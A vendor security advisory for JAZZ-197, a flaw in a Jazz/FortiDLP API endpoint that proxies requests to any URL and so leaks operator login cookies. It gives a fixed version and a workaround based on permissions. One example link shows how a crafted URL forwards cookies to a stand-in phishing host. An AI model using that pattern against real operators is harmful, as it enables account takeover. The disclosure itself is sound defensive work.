Description | This article discusses JAZZ-197: Proxying HTTP requests. |
Scope | FortiDLP. |
Solution |
Release Date: 28th May, 2019
Overview: The Jazz API endpoint /api/v1/infrastructure/services/ proxies to any HTTP location specified in the URL, potentially leaking login cookies to the proxied site.
Affected Products:
Unaffected Products:
Resolution: This issue is now been fixed in Jazz Infrastructure version 4.0.11.
It is strongly recommended that all on-premise installations running an affected version upgrade to the latest release as soon as possible. Releases are available to download through the support portal. Jazz Cloud customers are unaffected.
If it is not possible to upgrade, disable the access to this API endpoint by creating a role using the Jazz API via api/v1/roles and removing the permissions CAN_RESTART_SERVICES assigning this role to all operators via the LDAP configuration interface or the internal operators API.
Vulnerability Information: JAZZ-197 allows the Jazz API endpoint /api/v1/infrastructure/services/ to proxy to any URL specified. If an authorized and authenticated Jazz operator clicks on a link of the form https://www.example.com/api/v1/infrastructure/service/phish.example.com:80 this will forward login cookies (and other HTTP headers) to phish.example.com. This could be used from the browser to compromise the operator's account.
Acknowledgments: Issue found internally by Jazz Networks.
Disclosure Timeline:
|
The Fortinet Security Fabric brings together the concepts of convergence and consolidation to provide comprehensive cybersecurity protection for all users, devices, and applications and across all network edges.
Copyright 2025 Fortinet, Inc. All Rights Reserved.